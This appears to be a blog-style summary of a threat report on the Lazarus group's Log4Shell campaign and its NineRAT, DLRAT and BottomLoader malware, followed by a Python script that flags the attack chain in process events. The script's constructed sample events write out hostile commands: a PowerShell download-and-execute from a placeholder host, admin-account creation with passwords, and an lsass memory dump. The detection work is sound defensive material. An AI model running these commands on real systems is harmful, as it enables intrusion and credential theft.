December 11, 2023 at 04:29PM
Lazarus, the North Korean hacking group, is exploiting CVE-2021-44228 to launch new malware families written in DLang as part of “Operation Blacksmith.” This campaign, targeting various industries, demonstrates the group’s evolving tactics. The new malware includes the remote access trojans NineRAT and DLRAT, as well as the downloader BottomLoader. Lazarus uses Log4Shell to gain initial access and deploy its tooling; NineRAT can execute a range of commands and may share the data it collects with other threat groups.
From the meeting notes, the key takeaways are:
1. Lazarus, a notorious North Korean hacking group, is exploiting the Log4j vulnerability (CVE-2021-44228), known as “Log4Shell,” to deploy three newly developed malware families written in DLang: two remote access trojans (NineRAT and DLRAT) and a malware downloader named BottomLoader.
2. These malware tools represent a notable shift in Lazarus’ tactics and tools, with the campaign named “Operation Blacksmith” targeting manufacturing, agricultural, and physical security companies worldwide.
3. NineRAT uses the Telegram API for command and control communication, supporting various commands for information gathering, file exfiltration, and system manipulation, while DLRAT collects system information and can introduce additional payloads on an infected system.
4. BottomLoader is a malware downloader that fetches and executes payloads from a hardcoded URL using PowerShell while also establishing persistence and offering file exfiltration capabilities.
5. The Log4Shell attacks observed by Cisco Talos exploit the critical remote code execution flaw in Log4j on publicly facing VMware Horizon servers, giving the attackers code execution on those hosts.
6. Following the compromise, Lazarus sets up a proxy tool for persistent access, runs reconnaissance commands, creates new admin accounts, and deploys credential-stealing tools such as ProcDump and Mimikatz, then deploys NineRAT in the second phase of the attack.
7. There is a possibility that Lazarus feeds other APT groups or clusters under its umbrella with data collected by NineRAT: because it performs system “re-fingerprinting” in some cases, it may be carrying out system identification and data collection on behalf of multiple actors.
These clear takeaways provide an overview of the meeting notes and the significant points discussed during the meeting.
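As an added example (not code from the Talos report or from this post), the following Python triage function turns the post-compromise chain in points 4 and 6 (PowerShell download, reconnaissance, new admin accounts, ProcDump/Mimikatz) into detection logic run over constructed process-creation events; the regexes, host names, command lines and URL are assumptions, not indicators from the campaign.

```python
import re
from collections import defaultdict

# Stage patterns derived from the behaviours described above; the exact
# regexes are assumptions and should be tuned to local telemetry.
STAGES = {
    "recon": re.compile(r"\b(whoami|systeminfo|ipconfig|netstat|tasklist)\b", re.I),
    "admin_account": re.compile(r"\bnet1?\s+(user|localgroup)\b.*\s/add\b", re.I),
    "cred_dump": re.compile(r"\b(procdump(64)?\.exe|mimikatz)\b", re.I),
    "ps_download": re.compile(
        r"powershell.*\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
}

# Constructed process-creation events (Sysmon-like fields), not real telemetry.
SAMPLE_EVENTS = [
    {"host": "horizon-01", "cmdline": "cmd.exe /c whoami"},
    {"host": "horizon-01", "cmdline": "cmd.exe /c netstat -ano"},
    {"host": "horizon-01", "cmdline": "net user svcbackup P@ss /add"},
    {"host": "horizon-01", "cmdline": "net localgroup administrators svcbackup /add"},
    {"host": "horizon-01", "cmdline": "procdump64.exe -accepteula -ma lsass.exe out.dmp"},
    {"host": "horizon-01", "cmdline": "powershell -c IEX (New-Object Net.WebClient)"
                                      ".DownloadString('http://PLACEHOLDER-C2/stage2')"},
    {"host": "fileserver-02", "cmdline": "net user auditor Temp1! /add"},
    {"host": "build-07", "cmdline": "powershell -c Get-ChildItem C:\\"},
]


def classify(event):
    """Return the set of stage names whose pattern matches the command line."""
    return {name for name, rx in STAGES.items() if rx.search(event["cmdline"])}


def triage(events):
    """Group matched stages per host and flag hosts that show the chain above:
    a new admin account plus a credential-dumping tool, or three or more stages."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= classify(ev)
    flagged = {h for h, s in per_host.items()
               if {"admin_account", "cred_dump"} <= s or len(s) >= 3}
    return dict(per_host), flagged


if __name__ == "__main__":
    stages, hosts = triage(SAMPLE_EVENTS)
    for host in sorted(stages):
        print(f"{host}: {sorted(stages[host])}{'  <-- FLAGGED' if host in hosts else ''}")
```

A single `net user /add` on fileserver-02 is reported but not flagged; the point is correlating several stages on one host, as the campaign sequence does.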